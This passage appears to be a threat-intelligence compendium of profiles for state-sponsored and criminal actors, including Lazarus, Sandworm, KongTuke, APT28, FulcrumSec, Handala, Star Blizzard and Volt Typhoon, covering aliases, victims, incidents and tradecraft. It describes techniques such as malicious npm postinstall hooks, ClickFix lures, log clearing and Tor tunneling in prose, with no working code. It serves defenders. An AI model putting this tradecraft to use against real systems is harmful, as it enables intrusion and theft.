file systems, dir bootflash, and terminal formatting commands; Guestshell enablement followed by destruction; log-clearing sequences including show logging, clear logging, and exit; and rapid VTY access-class removal and re-application following HTTP configuration activity. These behaviors map to reconnaissance, remote services, proxying/tunneling, exploitation of public-facing applications, command execution, defense evasion, and valid-account abuse. The content also places Salt Typhoon among representative Chinese state-sponsored actors alongside APT41 and Volt Typhoon, and cites it as an example of how Chinese cyber campaigns rely on a commercial support layer of private firms, contractors, and data brokers.

Lazarus Group is a North Korea-linked, state-sponsored threat actor, also referred to in the provided content as Hidden Cobra, Guardians of Peace, Labyrinth Chollima, Stardust Chollima, Diamond Sleet, Zinc, UNC1069, UNC1720, Storm-0139, Storm-0954, Storm-1222, Copernicium, Nickel Academy, Nickel Gladstone, Black Artemis, and Lazarus APT/Lazarus APT Group/Lazarus Group. The content also describes financially motivated subgroups or affiliates under the Lazarus umbrella, including BlueNoroff, also called Sapphire Sleet, and references Stardust Chollima/Bluenoroff/APT38 in relation to financial operations. Based on the provided content, Lazarus has conducted both espionage and financially motivated operations, with repeated targeting of financial institutions, cryptocurrency organizations, software supply chains, and South Korean entities. Reported activity linked to Lazarus in the content includes the Sony Pictures Entertainment intrusion, the Bangladesh Central Bank SWIFT theft, attempted bank intrusions using Ratabanka, and evidence tying the group to WannaCry. The content also states that Lazarus was attributed in the KelpDAO LayerZero bridge attack affecting Aave, and that on February 24, 2025 Lazarus allegedly compromised an offline Ethereum wallet associated with ByBit and stole $1.5 billion in digital assets. The group’s tradecraft in the provided material includes social engineering and impersonation, especially recruiter-themed lures. During Operation Dream Job, Lazarus impersonated HR hiring personnel through LinkedIn messages and fake interviews to trick victims into downloading malware. A simulation based on a December 2018 Chilean interbank intrusion attributed to Stardust Chollima describes fake job recruitment via LinkedIn and Skype, a malicious .NET dropper disguised as a job application, execution of a Base64-encoded PowerShell payload, HTTPS command-and-control, and persistence via Registry Run keys and service creation. The content also describes Lazarus-linked malware and techniques focused on stealth and evasion. One reported Lazarus subgroup targeting financial institutions and cryptocurrency organizations used an almost entirely memory-resident framework composed of DPAPILoader, RemotePELoader, and RemotePE. This framework used Windows DPAPI for environmental keying, retrieved payloads from attacker-controlled infrastructure, and provided in-memory remote access capabilities including command execution, file manipulation, process management, and data access while reducing forensic visibility. The content further notes documented Lazarus use of ATT&CK T1036.003, renaming system utilities for masquerading and defense evasion. The Lazarus umbrella is also linked in the content to software supply-chain activity. Microsoft attributed the June 2026 Mastra npm compromise to BlueNoroff/Sapphire Sleet, described as an affiliate of Lazarus Group. In that incident, attackers compromised an npm maintainer account, published malicious versions of more than 140 Mastra-related packages, inserted a typosquatted dependency named easy-day-js, and used a postinstall hook to disable TLS verification, contact command-and-control infrastructure, and deploy a Node.js backdoor that stole credentials, browser data, and cryptocurrency wallet information, with additional PowerShell payloads delivered in some cases. The content also notes tradecraft overlap between this activity and an earlier Axios npm compromise attributed by Microsoft to Sapphire Sleet and by Google Threat Intelligence Group to UNC1069. The provided material additionally states that actors working under the Lazarus umbrella used LLMs to accelerate spear-phishing operations in early 2024, particularly to scale social engineering rather than autonomously develop malware.

Sandworm is a Russian state-sponsored threat actor associated with Russia’s military intelligence agency, the GRU, and specifically linked in the content to Unit 74455. Reported aliases include APT44, BE2, BlackEnergy / BlackEnergy Group, Blue Echidna, Electrum, FROZENBARENTS, Iridium, Iron Viking, Phantom, Quedagh, Seashell Blizzard, TeleBots, UAC-0113, Unit 74455, Voodoo Bear, and Sandworm Team. The group is described as active since 2014. The content associates Sandworm with cyber espionage and cyberwarfare operations and states that it has consistently targeted government bodies, energy firms, and research institutions, with a focus on intelligence collection. It is also linked to disruptive and destructive operations. In 2015, Sandworm attacked electrical distribution substations in Ukraine, causing power outages. During that operation, the group manipulated equipment, used malware to wipe Windows-based systems and impede recovery, and developed malicious firmware to brick serial-to-ethernet converters, creating loss-of-control conditions and forcing greater reliance on manual operations. During the 2016 Ukraine Electric Power Attack, Sandworm Team used an arbitrary system service to load Industroyer at boot for persistence and replaced the ImagePath registry value of a Windows service with a backdoor binary. The content also attributes the 2018 Pyeongchang Winter Olympics OLYMPICDESTROYER attack to Sandworm, stating the group directly deployed the wiper, disabling Wi-Fi at the opening ceremony, disrupting the official ticketing system, affecting broadcast drone operations, compromising more than 300 systems, and requiring roughly 12 hours for restoration. More recent reporting in the content describes a Sandworm spear-phishing campaign using ZIP archives containing disguised LNK files. Opening the LNK triggers a multi-stage infection chain that extracts hidden payloads, runs a PowerShell control script, displays a decoy PDF, and establishes persistence via hidden scheduled tasks masquerading as legitimate applications such as Opera GX and Dropbox. A notable tradecraft evolution described is the use of dual-layer SSH-over-Tor tunneling: Tor hidden services expose internal services such as SMB and RDP, while SSH provides authenticated localhost-only remote access. Additional behaviors mentioned include Obfs4 traffic obfuscation, sandbox and virtual machine checks, mutex controls, cleanup of installation traces, and transmission of victim identification data to a hardcoded onion-based command-and-control server. The content further states that Sandworm has exploited CVE-2025-8088, a WinRAR vulnerability, and that in November 2025 a phishing wave targeting Ukraine delivered malware via RAR archives exploiting that flaw. Sandworm is also linked in the content to incidents affecting civilian infrastructure, including attribution by investigators connecting the Cyber Army of Russia Reborn to Sandworm in relation to a January 2024 water-sector incident in Muleshoe, Texas. Technique examples explicitly mentioned in the content include spear-phishing with malicious Office attachments and macros, staging trojanized legitimate software installers in forums for initial access, PowerShell execution, file enumeration on compromised hosts, and Active Directory discovery via LDAP queries to identify usernames.

KongTuke is a financially motivated initial access broker and traffic distribution system (TDS) active since at least 2024, also tracked as Woodgnat, 404 TDS, Chaya_002, LandUpdate808, and TAG-124. The reporting describes it as an access-broker service rather than a single malware family: it compromises legitimate, especially WordPress, websites, injects external JavaScript, and uses fake CAPTCHA, ClickFix, CrashFix, and FileFix-style social engineering to trick users into executing obfuscated PowerShell or other commands that fetch second-stage payloads. More recently, it has also used external Microsoft Teams chats while impersonating IT or help-desk staff to obtain persistent access to corporate networks in minutes. KongTuke has been linked to financially motivated intrusions against organizations in sectors including insurance, education, IT, professional services, industrial, legal, and energy, and reporting also ties its infrastructure to healthcare and other critical infrastructure targeting through downstream ransomware customers. Its business model is to compromise corporate networks and sell access to other criminals, including ransomware operators. Content directly links KongTuke-associated access or infrastructure to Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and AlphV/BlackCat. The actor’s tooling and delivery ecosystem includes ModeloRAT, a Python RAT/backdoor attributed to the group; Mistic, also tracked as MLTBackdoor, which Symantec and Carbon Black linked to KongTuke with low confidence; XorBee RAT; MintsLoader; D3F@ck Loader; Emmenhtal; Remcos; AsyncRAT; and Interlock RAT. ModeloRAT has been observed in ClickFix and Microsoft Teams social-engineering campaigns, while Mistic has been delivered via multi-stage ClickFix chains and uses DLL sideloading, in-memory execution, and self-deletion. Reporting also notes use of WinPython, Node.js, finger.exe, a fake NexShield browser extension, and the encrypted GateKeeper .NET payload. Observed tactics and techniques in the content include compromised-site web injects, SEO poisoning, TDS-based victim filtering and redirection, fake browser update and CAPTCHA lures, clipboard hijacking, paste-and-run execution, abuse of LOLBins such as PowerShell, curl, certutil, WMIC, net.exe, reg.exe, and finger.exe, DLL sideloading, in-memory payload execution, scheduled-task and Run-key persistence, anti-analysis checks, and victim profiling to distinguish standalone from domain-joined enterprise systems. Multiple reports describe KongTuke as operating broad, opportunistic campaigns and then assessing which footholds can be sold onward. The content also notes links between TAG-124/LandUpdate808 infrastructure and SocGholish, TA866/Asylum Ambuscade, and Interlock, but does not establish those as aliases or sub-groups of KongTuke.

APT28 is a state-sponsored advanced persistent threat group widely attributed in the content to Russia’s GRU military intelligence service. It is also tracked as Fancy Bear, Sofacy, Sednit, STRONTIUM, Pawn Storm, and Forest Blizzard. The content describes APT28 as conducting long-term cyber-espionage operations aligned with Russian strategic interests, particularly against political, military, diplomatic, government, and defense-related targets. Reported targeting in the content includes the 2016 Democratic National Committee breach, Emmanuel Macron’s 2017 presidential campaign, NATO’s Joint Air Power Competence Centre, the German Bundestag, TV5Monde, the World Anti-Doping Agency, the OSCE, Ukraine’s Ministry of Defence, U.S. nuclear facilities, and cybersecurity firms. The content also notes spearphishing against Ukrainian targets, including emails impersonating Ukrainian government officials. Tradecraft directly described in the content includes spear-phishing, credential theft and credential dumping, password spraying against government and defense sectors, deployment of custom malware such as X-Agent, persistence, lateral movement, remote command-and-control activity, and use of malicious Microsoft Office attachments in spear-phishing emails. The content also references a Linux XAgent variant. In specific operations, APT28 is described as using spear-phishing to lure victims into clicking malicious links or opening attachments, harvesting credentials for broader access, deploying X-Agent for remote command execution and file transfer, and moving laterally to reach critical systems. The content also attributes LoJax to APT28, describing it as the first known real-world UEFI malware attack, and states that Russia’s GRU-linked APT28 group used compromised Ubiquiti routers as an espionage relay in a separate operation. The aliases list in the source is noisy and includes names commonly associated with other actors; only the aliases directly supported by the content for this actor are included above.

FulcrumSec is a financially motivated data-theft and extortion threat actor active since at least September 2025, with reporting also describing its emergence around October or the end of 2025. The group targets cloud-native organizations and specializes in high-speed exfiltration of cloud-hosted data rather than relying primarily on file encryption. Reported tradecraft includes exploiting unrotated API keys, exposed or hardcoded GitHub personal access tokens, unrotated JWT signing secrets, misconfigured cloud permissions and storage, over-permissioned cloud identities, exposed credentials in client-side JavaScript, and unpatched internet-facing applications including CVE-2025-55182 (React2Shell). The content also states that FulcrumSec uses legitimate tooling such as rclone for exfiltration, maintains leak or shame infrastructure on both clearnet and Tor, and has a leak-site section referred to as "Index of /Shame." One source says the group refers to its model as "steal and squeeze" and also uses the nickname "The Threat Thespians." The group is consistently described as a hack-and-leak or pure extortion actor, though some reporting also labels it a ransomware group and attributes double-extortion behavior to it in the Global Schools Foundation incident. Victim sectors mentioned in the content include technology, business services, healthcare, consumer services, financial services, and education. Countries represented in the victim reporting include the United States, United Kingdom, India, Denmark, Singapore, and Australia. Named victims in the content include Novo Nordisk, Global Schools Group / Global Schools Foundation, Arup Group, Avnet, youX, and LexisNexis, as well as additional listed victims including Lena Health, Woundtech, MCO, ReFocus AI, Hatica, Analog Gold / Prospector, Nordstern Technologies, ParkEngage, Saleskido, Interzero, IMEVI, Raptor Supplies, Rotary Club, JOT, BookBlock, Crank Communications, CrediElite, and Fashinza. Reported victim counts in the content are approximately 25 to 26 organizations across 11 countries, with most victims headquartered in the United States. The content links FulcrumSec to several notable incidents. In the Novo Nordisk intrusion, FulcrumSec claimed it maintained access for more than two months, stole about 1.3 TB across more than 700,000 files, and demanded $25 million before leaking data. In reporting on youX, the group allegedly abused long-lived production credentials and unrotated JWT secrets. In reporting on LexisNexis, the group allegedly exploited React2Shell and obtained access through an Amazon ECS task role with broad secrets access. In reporting on Arup Group, FulcrumSec claimed initial access via a hardcoded GitHub token on a forgotten subdomain and subsequent access to large volumes of GitHub, Azure, AWS, and database data. The content also attributes the Global Schools Group / Foundation breach and related extortion activity to FulcrumSec, including publication threats and court actions seeking to restrain leaks. Known aliases and related names directly mentioned in the content are FulcrumSec and "The Threat Thespians."

Handala is an Iran-linked threat actor and hacktivist persona assessed with high confidence as a MOIS-affiliated front operating within the Banished Kitten cyber ecosystem. It is also tracked as Void Manticore by Microsoft and Storm-0842 by Check Point Research. Reported aliases in the provided content include Banished Kitten, Dune, Handala Hack, Handala Hack Team, Homeland Justice, Red Sandstorm, Storm-0842, and Void Manticore. The content also states that Handala Hack Team is an Iranian hacktivist persona first observed in 2023 and operated by COBALT MYSTIQUE. The actor is described as conducting hack-and-leak, destructive, and psychological operations, and as routinely overstating its capability and impact while at times carrying out real data theft and wiper attacks. Confirmed or reported targeting in the content includes U.S. critical infrastructure and healthcare-related organizations, notably California Water Service and Stryker. In the Cal Water case, Handala claimed to have breached the utility, leaked 5 GB of alleged data, and asserted it could disrupt water supply operations. Multiple reports cited in the content state that subsequent investigation by Cal Water and Mandiant found no evidence of threat actor activity in Cal Water’s internal IT or OT environments, with activity limited to unauthorized access to a small number of user accounts in two third-party service provider platforms, one customer online account accessed with stolen credentials, and a third-party GPS correction website. Separate reporting in the content, including Dataminr analysis, states that leaked materials indicated compromise of a customer billing database and an internal RTKBase NTRIP caster environment, with plaintext credentials exposed and possible pivoting between those environments; however, OT or ICS disruption was not confirmed. The content also attributes to Handala a March 2026 attack on Stryker that was described as a wiper attack. Handala claimed it exfiltrated 50 TB of critical data and permanently erased 200,000 devices and 12 PB of Stryker data. The content further states that Handala’s toolkit includes custom wipers named win.handala, Handala Wiper, and Hamsa Wiper, as well as MBR-overwriting capabilities. Across reporting cited here, Handala is associated with data exfiltration, public leaking of stolen data, extortion-style pressure, wiper deployment, and influence or intimidation messaging. Tactics and techniques directly mentioned in the content include impersonation of individuals familiar to victims and technical support associated with social messaging services, PowerShell execution, and video capture-related activity annotated to Void Manticore. The broader reporting also describes likely or observed Iran-linked tradecraft around exploitation of internet-exposed systems, credential attacks, phishing, password spraying, ransomware, wiper malware, website defacement, DDoS, and hack-and-leak operations. Handala has been publicly linked in the content to retaliation-themed operations following U.S. and Israeli military actions against Iran, and is repeatedly characterized as Iran-linked, widely believed to be a front for Iranian government hacking operations, and specifically suspected of serving Iran’s Ministry of Intelligence.

Star Blizzard is a Russia-linked cyber espionage threat actor also tracked as COLDRIVER, Callisto, Callisto Group, SEABORGIUM, TA446, UNC4057, BlueCharlie, Blue Callisto, Calisto, Cold River, Gossamer Bear, and related variants. Multiple governments and public reporting cited in the content attribute the group to the Russian Federal Security Service (FSB), including as a subordinate or operational unit within FSB Centre 18 / Center 18. The actor conducts tailored spear-phishing and credential theft operations against high-value targets. Reported targets include Russian and Belarusian civil society, Russian opposition figures in exile, independent media, international NGOs active in Eastern Europe, journalists, think tanks, academics, former officials, former intelligence and military officers, government and military personnel, defense contractors, Department of Energy staff, and at least one former U.S. ambassador. Reporting also states the group has targeted parliamentarians, universities, the public sector, and NGOs, and has focused heavily on NATO countries while also targeting Ukraine-related organizations. Observed tradecraft includes registering impersonation email accounts to spoof experts, colleagues, funders, government personnel, or organizations affiliated with the intended target; using compromised or lookalike accounts; and sending highly personalized phishing emails aligned to the victim’s professional context. In the documented "River of Phish" activity, the group used fake protected or encrypted PDF lures, sometimes omitting the attachment in an initial email to induce a reply before sending the lure. The PDFs directed victims to attacker-controlled infrastructure that fingerprinted the victim’s browser and system, optionally presented hCaptcha, and redirected to phishing pages impersonating Gmail or ProtonMail. The objective was credential theft, including passwords, 2FA codes, and session cookies, enabling account takeover. The content also states the group incorporated the Evilginx framework into spear-phishing activity and used JavaScript to redirect victims from adversary-controlled servers to Evilginx-hosted phishing infrastructure. Additional reporting in the content states Star Blizzard has uploaded malicious payloads to cloud storage sites and has sent emails with malicious PDF files to deliver malware. Google TAG reporting referenced in the content notes Microsoft uncovered a similar QR-code campaign tied to Callisto Group / Coldriver / Star Blizzard that targeted WhatsApp accounts linked to dozens of civil society organizations and journalists. The group has also been linked to hack-and-leak activity. The content states information stolen by COLDRIVER was used in hack-and-leak operations, including leaks related to UK-US trade documents ahead of the 2019 UK election and material used in 2022 to exacerbate Brexit-related political divisions in the United Kingdom. Law-enforcement and sanctions actions described in the content include U.S. and UK sanctions against Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets as members or associates of the group, and U.S. Department of Justice and Microsoft actions to seize more than 100 domains allegedly used in the group’s spear-phishing infrastructure.

Volt Typhoon is a China-linked, state-sponsored threat actor focused on stealthy intrusion and long-term access in critical infrastructure environments. The content describes the group as targeting largely U.S. critical national infrastructure, including communications, energy, water, wastewater, and transportation systems, and specifically notes intrusions into water and wastewater IT environments across multiple U.S. critical sectors. Its objective is characterized as strategic positioning and prepositioning for potential future disruption during a crisis rather than immediate visible effects. The actor is described as relying heavily on living-off-the-land tradecraft, using victim-owned tools, systems, and credentials rather than deploying conventional malware, which makes detection difficult for SIEM and SOC teams. The content also links Volt Typhoon to the KV botnet and states that China-linked operators used compromised end-of-life SOHO routers, including Cisco and NetGear devices, to conceal access. One cited operation notes that in December 2023 the FBI disrupted KV-botnet malware from hundreds of U.S. SOHO routers that Volt Typhoon was using as relay infrastructure. A restricted WaterISAC notice title further indicates an IOC associated with Volt Typhoon performing network enumeration on Utah infrastructure. The content explicitly associates Volt Typhoon with techniques including PowerShell execution (T1059.001), exploitation for privilege escalation (T1068), and multi-hop proxying (T1090.003). It also states that the group has operated in this living-off-the-land manner for over five years. Aliases directly mentioned in the content include BRONZE SILHOUETTE, DEV-0391, Insidious Taurus, Storm-0391, UNC3236, Vanguard Panda, VOLTZITE, and G1017. The content also places Volt Typhoon alongside other Chinese state-sponsored campaigns such as Salt Typhoon and Flax Typhoon as examples of operations supported by a broader commercial ecosystem of private firms, contractors, and botnet infrastructure.